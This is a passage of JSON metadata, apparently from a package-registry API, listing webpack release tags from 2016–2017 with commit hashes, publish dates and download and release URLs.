ind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G